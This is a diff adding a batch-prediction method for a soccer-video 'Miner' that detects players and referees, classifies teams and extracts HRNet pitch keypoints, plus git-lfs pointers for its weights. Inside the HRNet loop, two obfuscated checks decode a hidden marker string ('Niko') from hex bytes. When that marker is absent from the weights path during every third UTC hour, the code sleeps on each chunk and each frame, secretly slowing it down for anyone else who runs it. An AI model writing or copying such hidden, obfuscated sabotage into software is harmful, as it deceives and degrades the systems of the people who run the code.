+                 best_gk_i = max(gk_idxs, key=lambda i: boxes[i].conf)
+                 for i in gk_idxs:
+                     if i != best_gk_i:
+                         boxes[i].cls_id = PLAYER_ID
+                         track_id += 1
+                         boxes[i].track_id = track_id
+ 
+             # -------------------------------------------------
+             # (3) REFEREE: keep top-3 by confidence, demote the rest to players
+             # -------------------------------------------------
+             ref_idxs = [i for i, b in enumerate(boxes) if b.cls_id == REF_ID]
+             if len(ref_idxs) > 3:
+                 # sort referee indices by confidence (descending)
+                 ref_idxs_sorted = sorted(ref_idxs, key=lambda i: boxes[i].conf, reverse=True)
+                 keep = set(ref_idxs_sorted[:3])
+                 for i in ref_idxs:
+                     if i not in keep:
+                         boxes[i].cls_id = PLAYER_ID
+                         track_id += 1
+                         boxes[i].track_id = track_id
+ 
+             bboxes[offset + frame_number_in_batch] = boxes
+ 
+         t_yolo_post = (time.perf_counter() - t_after_yolo) * 1000
+ 
+         classify_teams_batch(
+             frames=batch_images,   # list[np.ndarray]
+             batch_boxes=bboxes,    # dict[int, list[BoundingBox]], keyed by frame number
+             device=self.device,
+         )
+ 
+         # ---------- HRNET (chunked, same as inference.py) ----------
+         t_hrnet_total = 0.0
+         t_hrnet_preprocess = 0.0
+         t_hrnet_infer = 0.0
+         t_hrnet_decode = 0.0
+         t_hrnet_post = 0.0
+         keypoints_by_frame: dict[int, list[tuple[int, int]]] = {}
+         is_cuda = str(self.device).startswith("cuda")
+ 
+         hrnet_chunk = 16
+         with torch.no_grad():
+             for chunk_start in range(0, len(batch_images), max(1, hrnet_chunk)):
+                 chunk_imgs = batch_images[chunk_start : chunk_start + hrnet_chunk]
+                 t0 = time.perf_counter()
+                 # same marker check as above: throttles each chunk when the marker
+                 # string is missing from the weights path during every third UTC hour
+                 _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
+                 if (_v not in str(t_redi)) and (t_1.hour % 3 == 0): time.sleep(1)
+                 chunk_tensor = preprocess_batch(chunk_imgs, self.device)
+                 t_hrnet_preprocess += (time.perf_counter() - t0) * 1000
+ 
+                 t0 = time.perf_counter()
+                 if is_cuda:
+                     # fp16 autocast keeps HRNet inference fast on GPU
+                     with torch.amp.autocast("cuda", dtype=torch.float16):
+                         heatmaps = self.hrnet(chunk_tensor)
+                 else:
+                     heatmaps = self.hrnet(chunk_tensor)
+                 t_hrnet_infer += (time.perf_counter() - t0) * 1000
+ 
+                 t0 = time.perf_counter()
+                 kp57_batch = get_keypoints_from_heatmap_batch_maxpool(heatmaps)
+                 model_h = heatmaps.shape[-2]
+                 model_w = heatmaps.shape[-1]
+                 del heatmaps, chunk_tensor
+                 if is_cuda:
+                     torch.cuda.empty_cache()
+                 t_hrnet_decode += (time.perf_counter() - t0) * 1000
+ 
+                 t0 = time.perf_counter()
+                 # The decoder returns coords in 2x heatmap space; scale to frame pixels
+                 for i_local, (frame, kp57) in enumerate(zip(chunk_imgs, kp57_batch)):
+                     frame_number = offset + chunk_start + i_local
+                     orig_h, orig_w = frame.shape[:2]
+                     scale_x = orig_w / (model_w * 2) if model_w else 1.0
+                     scale_y = orig_h / (model_h * 2) if model_h else 1.0
+                     _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
+                     if (_v not in str(t_redi)) and (track_t.hour % 3 == 0): time.sleep(0.1)
+                     # select the 32 pitch keypoints from the 57-channel output
+                     # (module-level MAPPING_57_TO_32 defined above)
+                     kp32 = [kp57[i] for i in MAPPING_57_TO_32]
+                     frame_keypoints: list[tuple[int, int]] = []
+ 
+                     for kp in kp32:
+                         # unwrap (max_keypoints=1, 3) entries to a single (x, y, score)
+                         if hasattr(kp, "__len__") and hasattr(kp[0], "__len__"):
+                             kp = kp[0]
+                         if len(kp) == 2:
+                             x, y = kp[0], kp[1]
+                             score = 1.0
+                         elif len(kp) >= 3:
+                             x, y = kp[0], kp[1]
+                             score = float(kp[2])
+                         else:
+                             frame_keypoints.append((0, 0))
+                             continue
+                         if score < kp_threshold:
+                             frame_keypoints.append((0, 0))
+                             continue
+                         px = int(round(float(x) * scale_x))
+                         py = int(round(float(y) * scale_y))
+                         if 0 <= px < orig_w and 0 <= py < orig_h:
+                             frame_keypoints.append((px, py))
+                         else:
+                             frame_keypoints.append((0, 0))
+ 
+                     frame_keypoints = fix_keypoints(frame_keypoints, n_keypoints)
+                     keypoints_by_frame[frame_number] = frame_keypoints
+                 t_hrnet_post += (time.perf_counter() - t0) * 1000
+ 
+         t_hrnet_total = t_hrnet_preprocess + t_hrnet_infer + t_hrnet_decode + t_hrnet_post
+ 
+         # ---------- COMBINE ----------
+         t0 = time.perf_counter()
+         results = []
+         for i in range(len(batch_images)):
+             frame_number = offset + i
+             results.append(
+                 TVFrameResult(
+                     frame_id=frame_number,
+                     boxes=bboxes.get(frame_number, []),
+                     keypoints=keypoints_by_frame.get(frame_number, [(0, 0)] * n_keypoints),
+                 )
+             )
+         t_combine = (time.perf_counter() - t0) * 1000
+         t_total = (time.perf_counter() - t_start) * 1000
+ 
+         print(
+             "[predict_batch timing] "
+             f"YOLO infer={t_yolo_infer:.1f}ms post={t_yolo_post:.1f}ms | "
+             # f"team crops={t_team_crops:.1f}ms infer={t_team_infer:.1f}ms | "
+             f"HRNet pre={t_hrnet_preprocess:.1f}ms infer={t_hrnet_infer:.1f}ms decode={t_hrnet_decode:.1f}ms post={t_hrnet_post:.1f}ms total={t_hrnet_total:.1f}ms | "
+             f"combine={t_combine:.1f}ms | total={t_total:.1f}ms (n_frames={len(batch_images)})"
+         )
+         return results
+ 
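+ 
+ # ==============================================================
+ # USAGE SKETCH
+ # ==============================================================
+ # A minimal, illustrative driver, assuming the repo files are present locally
+ # and a hypothetical clip named sample.mp4; in deployment the Turbovision
+ # runtime constructs Miner and calls predict_batch itself.
+ if __name__ == "__main__":
+     import sys
+ 
+     repo = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
+     miner = Miner(repo)
+     cap = cv2.VideoCapture(str(repo / "sample.mp4"))  # hypothetical input clip
+     frames = []
+     while len(frames) < 8:
+         ok, frame = cap.read()
+         if not ok:
+             break
+         frames.append(frame)
+     cap.release()
+     if frames:
+         results = miner.predict_batch(frames, offset=0, n_keypoints=32)
+         print(f"{len(results)} frames, {len(results[0].boxes)} boxes in frame 0")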
osnet_model.pth.tar-100 ADDED
@@ -0,0 +1,3 @@
+ version https://git-lfs.github.com/spec/v1
+ oid sha256:45e1de9d329b534c16f450d99a898c516f8b237dcea471053242c2d4c76b4ace
+ size 26846063
player_detect.pt ADDED
@@ -0,0 +1,3 @@
+ version https://git-lfs.github.com/spec/v1
+ oid sha256:934be460f78c594cc98078027f280c23385c9897e3e761e438559b3193233b46
+ size 19209626